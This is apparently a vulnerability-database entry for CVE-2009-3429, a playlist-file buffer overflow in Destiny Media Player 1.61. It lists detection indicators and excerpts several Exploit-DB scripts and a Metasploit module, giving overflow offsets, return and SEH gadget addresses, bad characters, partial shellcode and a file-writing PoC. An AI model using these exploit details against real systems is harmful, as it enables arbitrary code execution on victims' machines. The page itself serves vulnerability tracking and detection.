CVE-2009-3429
Published: 2009-09-25
Priority: P347 · critical · 9.3 (CVSS 2.0)
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 35.05% (98.2th percentile)
Stack-based buffer overflow in Pirate Radio Destiny Media Player 1.61 allows remote attackers to execute arbitrary code via a long string in a .pls playlist file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pirateradio | destiny_media_player | — | — |
Detection & IOCs (extracted from sources)
- bytes: \xD0\x69\x83\x7c (return address, lst exploit)
- bytes: \xA6\x7B\x41\x00 (pop pop ret Destiny.exe SEH handler)
- bytes: \xEB\x06\x90\x90 (short jump next SEH)
- bytes: win32_exec shellcode (lst exploit): \x33\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b...
- bytes: win32_exec shellcode (pls SEH exploit): \x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b...
- Stack-based buffer overflow triggered by opening a crafted .pls, .m3u, or .lst playlist file in Destiny Media Player 1.61; overflow occurs at offset 2052 bytes for .lst files and ~31185 bytes for .m3u files.
- For .m3u exploitation, the overflow is triggered at approximately 31185 bytes of input.
- For .pls SEH-based exploitation, junk padding of 45224 bytes precedes the SEH overwrite.
- Metasploit module targets Destiny Media Player 1.61 via file format exploit; payload space is 800 bytes with bad chars \x00\x0a\x0d\x3c\x22\x3e\x3d and AlphanumMixed encoder required.
- Victim must manually open the malicious playlist file via File-->Open Playlist; this is a client-side file-format attack, not a network-delivered exploit.
- SEH-based .pls exploit uses a pop/pop/ret gadget inside Destiny.exe at 0x00417BA6; monitor for SEH chain overwrites pointing into Destiny.exe image space.
- Shellcode uses PexFnstenvSub encoder (Metasploit); detect FNSTENV-based shellcode decoder stubs in memory when Destiny Media Player processes playlist files.
- The working .lst exploit was confirmed only on Windows XP SP3; the PoC version did not function correctly according to the author.
- The Metasploit module's 'Destiny Universal' target ret address (0x00bf9d4d) was tested and confirmed by a third party (patrickw) on 2009-05-03; the Windows XP SP2 Spanish target uses a system DLL address (0x7c951eed) which may vary across patch levels.
- The .pls SEH exploit instructs the victim to open the file directly (not via import), unlike the .lst exploit which requires import from within the program.
No detection rules found.
Exploit-DB
Destiny Media Player 1.61 - PLS .m3u Buffer Overflow (Metasploit)
exploitdb·2010-04-30
---
##
# $Id: destinymediaplayer16.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Destiny Media Player 1.61 PLS M3U Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in the Destiny Media Player 1.61.
An attacker must send the file to victim and the victim must open the file. File-->Open Playlist
},
'License' => MSF_LICENSE,
'Author' => [ 'Trancek ' ],
'Version' => '$Revision: 9179 $',
'References' =
Exploit-DB
Destiny Media Player 1.61 - '.pls' Universal Buffer Overflow (SEH)
exploitdb·2009-08-01
---
#!/usr/bin/perl
#[+] Bug : Destiny Media Player 1.61 (.pls) Universal Buffer overflow (SEH)
#[+] Author : ThE g0bL!N
#[+] Greetz : ma 3labaliche :D
#[+] Use : open the pls file directly :)
#[+] Note: His0k4 Merci jamais Raditni
##########################################################
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
my $shellcode =
Exploit-DB
Destiny Media Player 1.61 - '.lst' Local Buffer Overflow (1)
exploitdb·2009-01-04
---
# Destiny Media Player 1.61 (lst File) Local Buffer overflow Exploit
# By:Encrypt3d.M!nd
#
# i was so stupid when i wrote the poc coz i didn't realize somethings :p
# well this is workin exploit tested on windows xp sp3
# don't double click the file,import it from the program
#
# Greetz:-=Mizo=-(thnx dude :X),L!0N,El Mariachi,MiNi SpIder,all my friends
#
chars = "A" * 2052
# win32_exec - EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com
shellcode = (
Exploit-DB
Destiny Media Player 1.61 - '.lst' Local Buffer Overflow (PoC)
exploitdb·2009-01-03
---
#
# Destiny Media Player (lst file) Buffer overflow PoC
# By:Encrypt3d.M!nd
# I'am Iraqian...Not Arabian
###########################################
# Well,i've tried to write an exploit for this shit but i couldn't
# the address after the NEW eip will over written,if anyone
# knows how to exploit this,be my guest
chars = "A"*2052
eip = "\x42\x42\x42\x42" # the eip will become 42424242
file=open('exp.lst','w')
file.write(chars+eip+chars)
file.close()
# milw0rm.com [2009-01-03]
Exploit-DB
Destiny Media Player 1.61 - '.m3u' Local Stack Overflow
exploitdb·2009-01-03
---
#usage: exploit.py
#After creating the m3u file, start the program then File > Open Playlist > exploit.m3u
print "**************************************************************************"
print " Destiny Media Player 1.61 (.m3u File) Local Stack Overflow Exploit\n"
print " Founder: aBo MoHaMeD"
print " exploit & code: His0k4"
print " Tested on: Windows XP Pro SP2 Fr\n"
print " Greetings to:"
print " All friends & muslims HaCkers(dz)\n"
print "**************************************************************************"
buff = "\x41" * 2052
EIP = "\x5D\x38\x82\x7C" #call ESP from kernel32.dll
nop = "\x90" * 10 #Blah Blah :D
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode =
Exploit-DB
Destiny Media Player 1.61 - '.m3u' Local Buffer Overflow (PoC)
exploitdb·2009-01-02
---
#!/usr/bin/perl -w
########################################################################
#Program : Destiny Media Player
#Version : 1.61.0
#website : http://www.pirateradio.com/downloads/
#Download : http://www.pirateradio.com/downloads/destinymp3.exe
#Type : (.m3u File) local Stack Overflow PoC
########################################################################
#EAX 61616161
#ECX 00000001
#EDX 014377A0
#EBX 0000000B
#ESP 0030FFEC
#EBP 00312C04 ASCII "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
#ESI 00000000
#EDI 00312C44 AS
Metasploit
Destiny Media Player 1.61 PLS M3U Buffer Overflow
metasploit
This module exploits a stack-based buffer overflow in the Destiny Media Player 1.61. An attacker must send the file to victim and the victim must open the file. File-->Open Playlist
No writeups or analysis indexed.
Published: 2009-09-25